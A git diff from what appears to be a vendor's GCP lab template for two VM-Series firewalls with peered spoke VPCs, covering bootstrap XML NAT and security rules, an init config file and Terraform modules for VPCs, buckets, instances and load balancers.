                 </entry>
-                <entry name="WordPress NAT">
-                  <destination-translation>
-                    <translated-address>web-server</translated-address>
-                    <translated-port>80</translated-port>
-                  </destination-translation>
+                <entry name="inbound-222">
                   <source-translation>
                     <dynamic-ip-and-port>
                       <interface-address>
@@ -789,13 +759,40 @@ DO NOT USE FOR PRODUCTION </login-banner>
                     <member>any</member>
                   </source>
                   <destination>
-                    <member>10.5.1.4</member>
+                    <member>any</member>
                   </destination>
-                  <service>service-http</service>
+                  <service>service-tcp-222</service>
+                  <nat-type>ipv4</nat-type>
+                  <dynamic-destination-translation>
+                    <translated-address>spoke2-vm</translated-address>
+                    <translated-port>22</translated-port>
+                  </dynamic-destination-translation>
+                  <to-interface>ethernet1/1</to-interface>
+                </entry>
+                <entry name="east-west">
+                  <source-translation>
+                    <dynamic-ip-and-port>
+                      <interface-address>
+                        <interface>ethernet1/2</interface>
+                      </interface-address>
+                    </dynamic-ip-and-port>
+                  </source-translation>
+                  <to>
+                    <member>trust-zone</member>
+                  </to>
+                  <from>
+                    <member>trust-zone</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <service>any</service>
                   <nat-type>ipv4</nat-type>
-                  <disabled>no</disabled>
                 </entry>
-                <entry name="Outbound nat">
+                <entry name="outbound">
                   <source-translation>
                     <dynamic-ip-and-port>
                       <interface-address>
@@ -807,7 +804,7 @@ DO NOT USE FOR PRODUCTION </login-banner>
                     <member>untrust-zone</member>
                   </to>
                   <from>
-                    <member>any</member>
+                    <member>trust-zone</member>
                   </from>
                   <source>
                     <member>any</member>
@@ -824,7 +821,12 @@ DO NOT USE FOR PRODUCTION </login-banner>
               <rules>
                 <entry name="interzone-default">
                   <action>deny</action>
-                  <log-start>yes</log-start>
+                  <log-start>no</log-start>
+                  <log-end>yes</log-end>
+                </entry>
+                <entry name="intrazone-default">
+                  <action>deny</action>
+                  <log-start>no</log-start>
                   <log-end>yes</log-end>
                 </entry>
               </rules>
@@ -955,16 +957,40 @@ DO NOT USE FOR PRODUCTION </login-banner>
             </vulnerability>
           </profiles>
           <address>
-            <entry name="web-server">
-              <ip-netmask>10.5.2.5</ip-netmask>
+            <entry name="spoke2-vm">
+              <ip-netmask>10.10.2.2</ip-netmask>
               <tag>
-                <member>web</member>
+                <member>spoke2-vpc</member>
               </tag>
             </entry>
-            <entry name="db-server">
-              <ip-netmask>10.5.3.5</ip-netmask>
+            <entry name="spoke1-vm">
+              <ip-netmask>10.10.1.2</ip-netmask>
               <tag>
-                <member>database</member>
+                <member>spoke1-vpc</member>
+              </tag>
+            </entry>
+            <entry name="spoke1-vpc">
+              <ip-netmask>10.10.1.0/24</ip-netmask>
+              <tag>
+                <member>spoke1-vpc</member>
+              </tag>
+            </entry>
+            <entry name="spoke2-vpc">
+              <ip-netmask>10.10.2.0/24</ip-netmask>
+              <tag>
+                <member>spoke2-vpc</member>
+              </tag>
+            </entry>
+            <entry name="fw1-untrust">
+              <ip-netmask>192.168.1.2</ip-netmask>
+            </entry>
+            <entry name="fw2-untrust">
+              <ip-netmask>192.168.1.3</ip-netmask>
+            </entry>
+            <entry name="spoke1-intlb">
+              <ip-netmask>10.10.1.100</ip-netmask>
+              <tag>
+                <member>spoke1-vpc</member>
               </tag>
             </entry>
           </address>
@@ -973,27 +999,24 @@ DO NOT USE FOR PRODUCTION </login-banner>
               <interface>
                 <member>ethernet1/1</member>
                 <member>ethernet1/2</member>
-                <member>ethernet1/3</member>
               </interface>
             </network>
           </import>
           <tag>
-            <entry name="web">
-              <color>color13</color>
+            <entry name="spoke2-vpc">
+              <color>color3</color>
             </entry>
-            <entry name="database">
-              <color>color15</color>
+            <entry name="spoke1-vpc">
+              <color>color24</color>
             </entry>
             <entry name="untrust-zone">
-              <color>color19</color>
-            </entry>
-            <entry name="web-zone">
-              <color>color17</color>
+              <color>color20</color>
             </entry>
-            <entry name="db-zone">
-              <color>color6</color>
+            <entry name="trust-zone">
+              <color>color13</color>
             </entry>
           </tag>
+          <profile-group/>
         </entry>
       </vsys>
     </entry>
diff --git a/gcp/adv_peering_2fw_2spoke/bootstrap_files/init-cfg.txt b/gcp/adv_peering_2fw_2spoke/bootstrap_files/init-cfg.txt
new file mode 100644
index 00000000..8d3c0290
--- /dev/null
+++ b/gcp/adv_peering_2fw_2spoke/bootstrap_files/init-cfg.txt
@@ -0,0 +1,10 @@
+type=dhcp-client
+ip-address=
+default-gateway=
+netmask=
+ipv6-address=
+ipv6-default-gateway=
+dhcp-accept-server-hostname=yes
+dns-primary=8.8.8.8
+dns-secondary=4.2.2.2
+op-command-modes=mgmt-interface-swap
\ No newline at end of file
diff --git a/gcp/adv_peering_2fw_2spoke/guide.pdf b/gcp/adv_peering_2fw_2spoke/guide.pdf
new file mode 100644
index 00000000..227722c9
Binary files /dev/null and b/gcp/adv_peering_2fw_2spoke/guide.pdf differ
diff --git a/gcp/adv_peering_2fw_2spoke/images/diagram.png b/gcp/adv_peering_2fw_2spoke/images/diagram.png
new file mode 100644
index 00000000..8ba1308e
Binary files /dev/null and b/gcp/adv_peering_2fw_2spoke/images/diagram.png differ
diff --git a/gcp/adv_peering_2fw_2spoke/images/directory.png b/gcp/adv_peering_2fw_2spoke/images/directory.png
new file mode 100644
index 00000000..b45b470e
Binary files /dev/null and b/gcp/adv_peering_2fw_2spoke/images/directory.png differ
diff --git a/gcp/adv_peering_2fw_2spoke/images/peering.png b/gcp/adv_peering_2fw_2spoke/images/peering.png
new file mode 100644
index 00000000..057ac136
Binary files /dev/null and b/gcp/adv_peering_2fw_2spoke/images/peering.png differ
diff --git a/gcp/adv_peering_2fw_2spoke/images/routes.png b/gcp/adv_peering_2fw_2spoke/images/routes.png
new file mode 100644
index 00000000..d6fb5d4a
Binary files /dev/null and b/gcp/adv_peering_2fw_2spoke/images/routes.png differ
diff --git a/gcp/adv_peering_2fw_2spoke/images/web.png b/gcp/adv_peering_2fw_2spoke/images/web.png
new file mode 100644
index 00000000..ae0534d5
Binary files /dev/null and b/gcp/adv_peering_2fw_2spoke/images/web.png differ
diff --git a/gcp/adv_peering_2fw_2spoke/main.tf b/gcp/adv_peering_2fw_2spoke/main.tf
new file mode 100644
index 00000000..c0bf8e83
--- /dev/null
+++ b/gcp/adv_peering_2fw_2spoke/main.tf
@@ -0,0 +1,136 @@
+provider "google" {
+  credentials = "${var.main_project_authfile}"
+  project     = "${var.main_project}"
+  region      = "${var.region}"
+}
+
+#************************************************************************************
+# CREATE VPCS - MGMT, UNTRUST, TRUST
+#************************************************************************************
+module "vpc_mgmt" {
+  source            = "./modules/create_vpc/"
+  vpc_name          = "mgmt-vpc"
+  subnetworks       = ["mgmt-subnet"]
+  ip_cidrs          = ["192.168.0.0/24"]
+  regions           = ["${var.region}"]
+  ingress_allow_all = true
+  ingress_sources   = ["0.0.0.0/0"]
+}
+
+module "vpc_untrust" {
+  source            = "./modules/create_vpc/"
+  vpc_name          = "untrust-vpc"
+  subnetworks       = ["untrust-subnet"]
+  ip_cidrs          = ["192.168.1.0/24"]
+  regions           = ["${var.region}"]
+  ingress_allow_all = true
+  ingress_sources   = ["0.0.0.0/0"]
+}
+
+module "vpc_trust" {
+  source            = "./modules/create_vpc/"
+  vpc_name          = "trust-vpc"
+  subnetworks       = ["trust-subnet"]
+  ip_cidrs          = ["192.168.2.0/24"]
+  regions           = ["${var.region}"]
+  ingress_allow_all = true
+  ingress_sources   = ["0.0.0.0/0"]
+}
+
+#************************************************************************************
+# CREATE GCP BUCKET FOR VMSERIES BOOTSTRAP
+#************************************************************************************
+module "bootstrap" {
+  source                = "./modules/create_bootstrap_bucket/"
+  bucket_name           = "vmseries-adv-peering"
+  randomize_bucket_name = true
+  file_location         = "bootstrap_files/"
+  
+  config                = ["init-cfg.txt", "bootstrap.xml"]                                                                          // default []
+  license               = ["authcodes"]                                                                                              // default []
+ # content               = ["panupv2-all-contents-8133-5346", "panup-all-antivirus-2917-3427", "panupv2-all-wildfire-331212-333889"] // default []
+ # software              = ["PanOS_vm-9.0.0"]                                                                                        // default []
+}
+#************************************************************************************
+# CREATE 2xVMSERIES FIREWALL W/ 3 NICS (MGMT VPC, UNTRUST VPC, TRUST VPC)
+#************************************************************************************
+module "vm_fw" {
+  source          = "./modules/create_vmseries/"
+  fw_names        = ["vmseries01", "vmseries02"]
+  fw_machine_type = "n1-standard-4"
+  fw_zones        = ["${var.region}-a", "${var.region}-b"]
+  fw_subnetworks  = ["${module.vpc_untrust.subnetwork_self_link[0]}", "${module.vpc_mgmt.subnetwork_self_link[0]}", "${module.vpc_trust.subnetwork_self_link[0]}"]
+
+  fw_nic0_ip = ["192.168.1.2", "192.168.1.3"] // default [""] - enables dynamically assigned IP
+  fw_nic1_ip = ["192.168.0.2", "192.168.0.3"]
+  fw_nic2_ip = ["192.168.2.2", "192.168.2.3"]
+
+  fw_bootstrap_bucket = "${module.bootstrap.bucket_name}"
+  fw_ssh_key          = "admin:${var.vmseries_ssh_key}"
+  fw_image            = "${var.vmseries_image}"
+
+  create_instance_group = true
+  instance_group_names  = ["vmseries01-ig", "vmseries02-ig"] // default "vmseries-instance-group"
+
+  dependencies = [
+    "${module.bootstrap.completion}",
+  ]
+}
+
+#************************************************************************************
+# CREATE VMSERIES PUBLIC HTTP LOAD BALANCER
+#************************************************************************************
+module "vmseries_public_lb" {
+  source = "./modules/create_public_lb/"
+  name   = "vmseries-lb"
+
+  backends = {
+    "0" = [
+      {
+        group = "${module.vm_fw.instance_group[0]}"
+      },
+      {
+        group = "${module.vm_fw.instance_group[1]}"
+      },
+    ]
+  }
+
+  backend_params = [
+    "/,http,80,10", // health check path, port name, port number, timeout seconds.
+  ]
+}
+
+#************************************************************************************
+# CREATE DEFAULT ROUTE TO WITHIN TRUST VPC TO FW1 & FW2
+#************************************************************************************
+resource "google_compute_route" "default" {
+  count             = "${length(module.vm_fw.fw_names)}"
+  name              = "default-to-${module.vm_fw.fw_names[count.index]}"
+  dest_range        = "0.0.0.0/0"
+  network           = "${module.vpc_trust.vpc_self_link}"
+  next_hop_instance = "${module.vm_fw.fw_self_link[count.index]}"
+  priority          = 100
+}
+
+#************************************************************************************
+# CREATE PEERING LINKS TRUST-to-SPOKE1 / TRUST-to-SPOKE2
+#************************************************************************************
+resource "google_compute_network_peering" "trust_to_spoke1" {
+  name         = "trust-to-spoke1"
+  network      = "${module.vpc_trust.vpc_self_link}"
+  peer_network = "${module.vpc_spoke1.vpc_self_link}"
+}
+
+resource "google_compute_network_peering" "trust_to_spoke2" {
+  name         = "trust-to-spoke2"
+  network      = "${module.vpc_trust.vpc_self_link}"
+  peer_network = "${module.vpc_spoke2.vpc_self_link}"
+
+  provisioner "local-exec" {
+    command = "sleep 45"
+  }
+
+  depends_on = [
+    "google_compute_network_peering.trust_to_spoke1",
+  ]
+}
diff --git a/gcp/adv_peering_2fw_2spoke/modules/create_bootstrap_bucket/main.tf b/gcp/adv_peering_2fw_2spoke/modules/create_bootstrap_bucket/main.tf
new file mode 100644
index 00000000..bfe60b19
--- /dev/null
+++ b/gcp/adv_peering_2fw_2spoke/modules/create_bootstrap_bucket/main.tf
@@ -0,0 +1,120 @@
+variable bucket_name {}
+
+variable file_location {}
+
+variable config {
+  type    = "list"
+  default = []
+}
+
+variable content {
+  type    = "list"
+  default = []
+}
+
+variable license {
+  type    = "list"
+  default = []
+}
+
+variable software {
+  default = []
+}
+
+variable randomize_bucket_name {
+  default = false
+}
+
+locals {
+  bucket_name = "${var.randomize_bucket_name ? join("", list(var.bucket_name, random_string.randomstring.result)) : var.bucket_name}"
+}
+
+resource "random_string" "randomstring" {
+  count       = "${var.randomize_bucket_name}"
+  length      = 25
+  min_lower   = 15
+  min_numeric = 10
+  special     = false
+}
+
+resource "google_storage_bucket" "bootstrap" {
+  name          = "${local.bucket_name}"
+  force_destroy = true
+}
+
+resource "google_storage_bucket_object" "config_full" {
+  count  = "${length(var.config) > 0 ? length(var.config) : "0" }"
+  name   = "config/${element(var.config, count.index)}"
+  source = "${var.file_location}${element(var.config, count.index)}"
+  bucket = "${google_storage_bucket.bootstrap.name}"
+}
+
+resource "google_storage_bucket_object" "content_full" {
+  count  = "${length(var.content) > 0 ? length(var.content) : "0" }"
+  name   = "content/${element(var.content, count.index)}"
+  source = "${var.file_location}${element(var.content, count.index)}"
+  bucket = "${google_storage_bucket.bootstrap.name}"
+}
+
+resource "google_storage_bucket_object" "license_full" {
+  count  = "${length(var.license) > 0 ? length(var.license) : "0" }"
+  name   = "license/${element(var.license, count.index)}"
+  source = "${var.file_location}${element(var.license, count.index)}"
+  bucket = "${google_storage_bucket.bootstrap.name}"
+}
+resource "google_storage_bucket_object" "software_full" {
+  count  = "${length(var.software) > 0 ? length(var.software) : "0" }"
+  name   = "software/${element(var.software, count.index)}"
+  source = "${var.file_location}${element(var.software, count.index)}"
+  bucket = "${google_storage_bucket.bootstrap.name}"
+}
+resource "google_storage_bucket_object" "config_empty" {
+  count  = "${length(var.config) == 0 ? 1 : 0 }"
+  name   = "config/"
+  content = "config/"
+  bucket = "${google_storage_bucket.bootstrap.name}"
+}
+
+resource "google_storage_bucket_object" "content_empty" {
+  count  = "${length(var.content) == 0 ? 1 : 0 }"
+  name   = "content/"
+  content = "content/"
+  bucket = "${google_storage_bucket.bootstrap.name}"
+}
+
+resource "google_storage_bucket_object" "license_empty" {
+  count  = "${length(var.license) == 0 ? 1 : 0 }"
+  name   = "license/"
+  content = "license/"
+  bucket = "${google_storage_bucket.bootstrap.name}"
+}
+
+resource "google_storage_bucket_object" "software_empty" {
+  count  = "${length(var.software) == 0 ? 1 : 0 }"
+  name   = "software/"
+  content = "software/"
+  bucket = "${google_storage_bucket.bootstrap.name}"
+}
+
+
+resource "null_resource" "dependency_setter" {
+  depends_on = [
+    "google_storage_bucket.bootstrap",
+    "google_storage_bucket_object.config_full",
+    "google_storage_bucket_object.content_full",
+    "google_storage_bucket_object.license_full",
+    "google_storage_bucket_object.software_full",
+    "google_storage_bucket_object.config_empty",
+    "google_storage_bucket_object.content_empty",
+    "google_storage_bucket_object.license_empty",
+    "google_storage_bucket_object.software_empty",
+  ]
+}
+
+output "completion" {
+  value = "${null_resource.dependency_setter.id}"
+}
+
+output "bucket_name" {
+  value = "${google_storage_bucket.bootstrap.name}"
+}
diff --git a/gcp/adv_peering_2fw_2spoke/modules/create_public_lb/main.tf b/gcp/adv_peering_2fw_2spoke/modules/create_public_lb/main.tf
new file mode 100644
index 00000000..961faca1
--- /dev/null
+++ b/gcp/adv_peering_2fw_2spoke/modules/create_public_lb/main.tf
@@ -0,0 +1,168 @@
+
+variable project {
+  description = "The project to deploy to, if not set the default provider project is used."
+  default     = ""
+}
+
+variable ip_version {
+  description = "IP version for the Global address (IPv4 or v6) - Empty defaults to IPV4"
+  default     = ""
+}
+
+variable name {
+  description = "Name for the forwarding rule and prefix for supporting resources"
+}
+
+variable backends {
+  description = "Map backend indices to list of backend maps."
+  type        = "map"
+}
+
+variable backend_params {
+  description = "Comma-separated encoded list of parameters in order: health check path, service port name, service port, backend timeout seconds"
+  type        = "list"
+}
+
+variable backend_protocol {
+  description = "The protocol with which to talk to the backend service"
+  default     = "HTTP"
+}
+
+variable create_url_map {
+  description = "Set to `false` if url_map variable is provided."
+  default     = true
+}
+
+variable url_map {
+  description = "The url_map resource to use. Default is to send all traffic to first backend."
+  default     = ""
+}
+
+variable http_forward {
+  description = "Set to `false` to disable HTTP port 80 forward"
+  default     = true
+}
+
+variable ssl {
+  description = "Set to `true` to enable SSL support, requires variable `ssl_certificates` - a list of self_link certs"
+  default     = false
+}
+
+variable private_key {
+  description = "Content of the private SSL key. Required if `ssl` is `true` and `ssl_certificates` is empty."
+  default     = ""
+}
+
+variable certificate {
+  description = "Content of the SSL certificate. Required if `ssl` is `true` and `ssl_certificates` is empty."
+  default     = ""
+}
+
+variable use_ssl_certificates {
+  description = "If true, use the certificates provided by `ssl_certificates`, otherwise, create cert from `private_key` and `certificate`"
+  default     = false
+}
+
+variable ssl_certificates {
+  type        = "list"
+  description = "SSL cert self_link list. Required if `ssl` is `true` and no `private_key` and `certificate` is provided."
+  default     = []
+}
+
+variable security_policy {
+  description = "The resource URL for the security policy to associate with the backend service"
+  default     = ""
+}
+
+variable cdn {
+  description = "Set to `true` to enable cdn on backend."
+  default     = "false"
+}
+
+
+resource "google_compute_global_forwarding_rule" "http" {
+  project    = "${var.project}"
+  count      = "${var.http_forward ? 1 : 0}"
+  name       = "${var.name}"
+  target     = "${google_compute_target_http_proxy.default.self_link}"
+  ip_address = "${google_compute_global_address.default.address}"
+  port_range = "80"
+  depends_on = ["google_compute_global_address.default"]
+}
+
+resource "google_compute_global_forwarding_rule" "https" {
+  project    = "${var.project}"
+  count      = "${var.ssl ? 1 : 0}"
+  name       = "${var.name}-https"
+  target     = "${google_compute_target_https_proxy.default.self_link}"
+  ip_address = "${google_compute_global_address.default.address}"
+  port_range = "443"
+  depends_on = ["google_compute_global_address.default"]
+}
+
+resource "google_compute_global_address" "default" {
+  project    = "${var.project}"
+  name       = "${var.name}-address"
+  ip_version = "${var.ip_version}"
+}
+
+# HTTP proxy when ssl is false
+resource "google_compute_target_http_proxy" "default" {
+  project = "${var.project}"
+  count   = "${var.http_forward ? 1 : 0}"
+  name    = "${var.name}-http-proxy"
+  url_map = "${element(compact(concat(list(var.url_map), google_compute_url_map.default.*.self_link)), 0)}"
+}
+
+# HTTPS proxy  when ssl is true
+resource "google_compute_target_https_proxy" "default" {
+  project          = "${var.project}"
+  count            = "${var.ssl ? 1 : 0}"
+  name             = "${var.name}-https-proxy"
+  url_map          = "${element(compact(concat(list(var.url_map), google_compute_url_map.default.*.self_link)), 0)}"
+  ssl_certificates = ["${compact(concat(var.ssl_certificates, google_compute_ssl_certificate.default.*.self_link))}"]
+}
+
+resource "google_compute_ssl_certificate" "default" {
+  project     = "${var.project}"
+  count       = "${(var.ssl && !var.use_ssl_certificates) ? 1 : 0}"
+  name_prefix = "${var.name}-certificate-"
+  private_key = "${var.private_key}"
+  certificate = "${var.certificate}"
+
+  lifecycle = {
+    create_before_destroy = true
+  }
+}
+
+resource "google_compute_url_map" "default" {
+  project         = "${var.project}"
+  count           = "${var.create_url_map ? 1 : 0}"
+  name            = "${var.name}"
+  default_service = "${google_compute_backend_service.default.0.self_link}"
+}
+
+resource "google_compute_backend_service" "default" {
+  project         = "${var.project}"
+  count           = "${length(var.backend_params)}"
+  name            = "${var.name}-backend-${count.index}"
+  port_name       = "${element(split(",", element(var.backend_params, count.index)), 1)}"
+  protocol        = "${var.backend_protocol}"
+  timeout_sec     = "${element(split(",", element(var.backend_params, count.index)), 3)}"
+  backend         = ["${var.backends["${count.index}"]}"]
+  health_checks   = ["${element(google_compute_http_health_check.default.*.self_link, count.index)}"]
+  security_policy = "${var.security_policy}"
+  enable_cdn      = "${var.cdn}"
+}
+
+resource "google_compute_http_health_check" "default" {
+  project      = "${var.project}"
+  count        = "${length(var.backend_params)}"
+  name         = "${var.name}-check-${count.index}"
+  request_path = "${element(split(",", element(var.backend_params, count.index)), 0)}"
+  port         = "${element(split(",", element(var.backend_params, count.index)), 2)}"
+}
+
+output "address" {
+  value = "${google_compute_global_address.default.address}"
+}
\ No newline at end of file
diff --git a/gcp/adv_peering_2fw_2spoke/modules/create_vm/main.tf b/gcp/adv_peering_2fw_2spoke/modules/create_vm/main.tf
new file mode 100644
index 00000000..dd140b46
--- /dev/null
+++ b/gcp/adv_peering_2fw_2spoke/modules/create_vm/main.tf
@@ -0,0 +1,127 @@
+variable vm_names {
+    type = "list"
+}
+variable vm_machine_type {}
+variable vm_zones {
+  type = "list"
+}
+variable vm_ssh_key {}
+
+variable vm_image {}
+variable vm_subnetworks {
+    type = "list"
+}
+
+variable vm_scopes {
+  type = "list"
+  default = [
+    "https://www.googleapis.com/auth/cloud.useraccounts.readonly",
+    "https://www.googleapis.com/auth/devstorage.read_only",
+    "https://www.googleapis.com/auth/logging.write",
+    "https://www.googleapis.com/auth/monitoring.write",
+  ]
+}
+
+
+variable internal_lb_create {
+  default = false
+}
+
+variable "internal_lb_health_check" {
+  default = "22"
+}
+
+variable "internal_lb_ports" {
+  type    = "list"
+  default = ["80"]
+}
+
+variable "internal_lb_name" {
+  default = "intlb"
+}
+
+variable "internal_lb_ip" {
+  default = ""
+}
+
+variable create_instance_group {
+  default = false
+}
+
+variable startup_script {
+default = ""
+}
+
+
+resource "google_compute_instance" "vm" {
+  count         = "${length(var.vm_names)}"
+  name          = "${element(var.vm_names, count.index)}"
+  machine_type              = "${var.vm_machine_type}"
+  zone                      = "${element(var.vm_zones, count.index)}"
+  can_ip_forward            = true
+  allow_stopping_for_update = true
+  metadata_startup_script   = "${var.startup_script}"
+
+
+  metadata {
+    serial-port-enable = true
+    sshKeys            = "${var.vm_ssh_key}"
+  }
+
+  network_interface {
+    subnetwork = "${element(var.vm_subnetworks, count.index)}"
+  }
+
+  boot_disk {
+    initialize_params {
+      image = "${var.vm_image}"
+    }
+  }
+
+  service_account {
+    scopes = "${var.vm_scopes}"
+  }
+}
+
+resource "google_compute_instance_group" "instance_group" {
+  count = "${var.internal_lb_create}"
+  name  = "${var.internal_lb_name}-group"
+  zone  = "${var.vm_zones[0]}"
+
+  instances = [
+    "${google_compute_instance.vm.*.self_link}",
+  ]
+}
+
+
+
+
+resource "google_compute_health_check" "health_check" {
+  count = "${var.internal_lb_create}"
+  name  = "${var.internal_lb_name}-check-${count.index}"
+
+  tcp_health_check {
+    port = "${var.internal_lb_ports[0]}"
+  }
+}
+
+resource "google_compute_region_backend_service" "backend_service" {
+  count         = "${var.internal_lb_create}"
+  name          = "${var.internal_lb_name}-backend-${count.index}"
+  health_checks = ["${google_compute_health_check.health_check.self_link}"]
+
+  backend {
+    group = "${google_compute_instance_group.instance_group.self_link}"
+  }
+}
+
+
+resource "google_compute_forwarding_rule" "forwarding_rule" {
+  count                 = "${var.internal_lb_create}"
+  name                  = "${var.internal_lb_name}-tcp"
+  load_balancing_scheme = "INTERNAL"
+  ip_address            = "${var.internal_lb_ip}"
+  ports                 = "${var.internal_lb_ports}"
+  subnetwork            = "${var.vm_subnetworks[0]}"
+  backend_service       = "${google_compute_region_backend_service.backend_service.self_link}"
+}
\ No newline at end of file
diff --git a/gcp/adv_peering_2fw_2spoke/modules/create_vmseries/main.tf b/gcp/adv_peering_2fw_2spoke/modules/create_vmseries/main.tf
new file mode 100644
index 00000000..8a87285a
--- /dev/null
+++ b/gcp/adv_peering_2fw_2spoke/modules/create_vmseries/main.tf
@@ -0,0 +1,176 @@
+variable fw_subnetworks {
+  type = "list"
+}
+
+variable fw_names {
+  type = "list"
+}
+
+variable fw_machine_type {}
+
+variable fw_zones {
+  type = "list"
+}
+
+variable fw_cpu_platform {
+  default = "Intel Skylake"
+}
+
+variable fw_bootstrap_bucket {
+  default = ""
+}
+
+variable fw_ssh_key {}
+
+variable public_lb_create {
+  default = false
+}
+
+variable fw_scopes {
+  type = "list"
+
+  default = [
+    "https://www.googleapis.com/auth/cloud.useraccounts.readonly",
+    "https://www.googleapis.com/auth/devstorage.read_only",
+    "https://www.googleapis.com/auth/logging.write",
+    "https://www.googleapis.com/auth/monitoring.write",
+  ]
+}
+
+variable fw_image {}
+
+variable fw_tags {
+  type    = "list"
+  default = []
+}
+
+variable create_instance_group {
+  default = false
+}
+
+variable instance_group_names {
+  type    = "list"
+  default = ["vmseries-instance-group"]
+}
+
+variable "dependencies" {
+  type    = "list"
+  default = []
+}
+
+variable fw_nic0_ip {
+  type    = "list"
+  default = []
+}
+
+variable fw_nic1_ip {
+  type    = "list"
+  default = []
+}
+
+variable fw_nic2_ip {
+  type    = "list"
+  default = []
+}
+
+resource "null_resource" "dependency_getter" {
+  provisioner "local-exec" {
+    command = "echo ${length(var.dependencies)}"
+  }
+}
+
+#************************************************************************************
+# CREATE VMSERIES 
+#***********************************************************************************
+resource "google_compute_instance" "vmseries" {
+  count                     = "${length(var.fw_names)}"
+  name                      = "${element(var.fw_names, count.index)}"
+  machine_type              = "${var.fw_machine_type}"
+  zone                      = "${element(var.fw_zones, count.index)}"
+  min_cpu_platform          = "${var.fw_cpu_platform}"
+  can_ip_forward            = true
+  allow_stopping_for_update = true
+  tags                      = "${var.fw_tags}"
+
+  metadata {
+    vmseries-bootstrap-gce-storagebucket = "${var.fw_bootstrap_bucket}"
+    serial-port-enable                   = true
+    sshKeys                              = "${var.fw_ssh_key}"
+  }
+
+  service_account {
+    scopes = "${var.fw_scopes}"
+  }
+
+  network_interface {
+    subnetwork    = "${var.fw_subnetworks[0]}"
+    access_config = {}
+    network_ip    = "${element(var.fw_nic0_ip, count.index)}"
+  }
+
+  network_interface {
+    subnetwork    = "${var.fw_subnetworks[1]}"
+    access_config = {}
+    network_ip    = "${element(var.fw_nic1_ip, count.index)}"
+  }
+
+  network_interface {
+    subnetwork = "${var.fw_subnetworks[2]}"
+    network_ip = "${element(var.fw_nic2_ip, count.index)}"
+  }
+
+  boot_disk {
+    initialize_params {
+      image = "${var.fw_image}"
+    }
+  }
+
+  depends_on = [
+    "null_resource.dependency_getter",
+  ]
+}
+
+#************************************************************************************
+# CREATE INSTANCE GROUP
+#************************************************************************************
+resource "google_compute_instance_group" "vmseries" {
+  count     = "${(var.create_instance_group) ? length(var.fw_names) : 0}"
+  name      = "${element(var.instance_group_names, count.index)}"
+  zone      = "${element(var.fw_zones, count.index)}"
+  instances = ["${google_compute_instance.vmseries.*.self_link[count.index]}"]
+
+  named_port {
+    name = "http"
+    port = "80"
+  }
+}
+
+
+
+
+
+
+#************************************************************************************
+# OUTPUTS
+#************************************************************************************
+
+output "fw_names" {
+  value = "${google_compute_instance.vmseries.*.name}"
+}
+
+output "fw_self_link" {
+  value = "${google_compute_instance.vmseries.*.self_link}"
+}
+
+output "instance_group" {
+  value = "${google_compute_instance_group.vmseries.*.self_link}"
+}
+
+
+output "fw_nic0_public_ip" {
+  value = "${google_compute_instance.vmseries.*.network_interface.0.access_config.0.nat_ip}"
+}
+
+output "fw_nic1_public_ip" {
+  value = "${google_compute_instance.vmseries.*.network_interface.1.access_config.0.nat_ip}"
+}
\ No newline at end of file
diff --git a/gcp/adv_peering_2fw_2spoke/modules/create_vpc/main.tf b/gcp/adv_peering_2fw_2spoke/modules/create_vpc/main.tf
new file mode 100644
index 00000000..e4511595
--- /dev/null
+++ b/gcp/adv_peering_2fw_2spoke/modules/create_vpc/main.tf
@@ -0,0 +1,71 @@
+variable vpc_name {}
+
+variable subnetworks {
+  type = "list"
+}
+
+variable ip_cidrs {
+  type = "list"
+}
+
+variable regions {
+  type = "list"
+}
+
+variable ingress_allow_all {
+  default = true
+}
+
+variable ingress_sources {
+  type    = "list"
+  default = ["0.0.0.0/0"]
+}
+
+resource "google_compute_network" "default" {
+  name                    = "${var.vpc_name}"
+  auto_create_subnetworks = false
+}
+
+resource "google_compute_subnetwork" "default" {
+  count         = "${length(var.subnetworks)}"
+  name          = "${element(var.subnetworks, count.index)}"
+  ip_cidr_range = "${element(var.ip_cidrs, count.index)}"
+  region        = "${element(var.regions, count.index)}"
+  network       = "${google_compute_network.default.self_link}"
+}
+
+resource "google_compute_firewall" "ingress_all" {
+  count         = "${var.ingress_allow_all}"
+  name          = "${google_compute_network.default.name}-ingress-all"
+  network       = "${google_compute_network.default.self_link}"
+  direction     = "INGRESS"
+  source_ranges = "${var.ingress_sources}"
+
+  allow {
+    protocol = "all"
+  }
+}
+
+output "subnetwork_id" {
+  value = "${google_compute_subnetwork.default.*.id}"
+}
+
+output "subnetwork_name" {
+  value = "${google_compute_subnetwork.default.*.name}"
+}
+
+output "subnetwork_self_link" {
+  value = "${google_compute_subnetwork.default.*.self_link}"
+}
+
+output "vpc_name" {
+  value = "${google_compute_network.default.*.name}"
+}
+
+output "vpc_id" {
+  value = "${google_compute_network.default.*.id[0]}"
+}
+
+output "vpc_self_link" {
+  value = "${google_compute_network.default.*.self_link[0]}"
+}
diff --git a/gcp/adv_peering_2fw_2spoke/outputs.tf b/gcp/adv_peering_2fw_2spoke/outputs.tf
new file mode 100644
index 00000000..dec2a032
--- /dev/null
+++ b/gcp/adv_peering_2fw_2spoke/outputs.tf
@@ -0,0 +1,37 @@
+#************************************************************************************
+# OUTPUTS
+#************************************************************************************
+output "                             IMPORTANT!! PLEASE READ!!                                    " {
+  value = [
+      "===================================================================================",
+      "Before proceeding, you must enable import/export custom routes on all peering links",
+      "and remove the default (0.0.0.0/0) route from TRUST, SPOKE1, and SPOKE2 VPCs",
+      "==================================================================================="]
+}
+output "GLB-ADDRESS   " {
+  value = "http://${module.vmseries_public_lb.address}"
+}
+
+output "MGMT-URL-FW1  " {
+  value = "https://${module.vm_fw.fw_nic1_public_ip[0]}"
+}
+
+output "MGMT-URL-FW2  " {
+  value = "https://${module.vm_fw.fw_nic1_public_ip[1]}"
+}
+
+output "SSH-SPOKE1-FW1" {
+  value = "ssh ubuntu@${module.vm_fw.fw_nic0_public_ip[0]} -p 221 -i <INSERT KEY>"
+}
+
+output "SSH-SPOKE2-FW1" {
+  value = "ssh ubuntu@${module.vm_fw.fw_nic0_public_ip[0]} -p 222 -i <INSERT KEY>"
+}
+
+output "SSH-SPOKE1-FW2" {
+  value = "ssh ubuntu@${module.vm_fw.fw_nic0_public_ip[1]} -p 221 -i <INSERT KEY>"
+}
+
+output "SSH-SPOKE2-FW2" {
+  value = "ssh ubuntu@${module.vm_fw.fw_nic0_public_ip[1]} -p 222 -i <INSERT KEY>"
+}
diff --git a/gcp/adv_peering_2fw_2spoke/scripts/showheaders.php b/gcp/adv_peering_2fw_2spoke/scripts/showheaders.php
new file mode 100644
index 00000000..19c37318
--- /dev/null
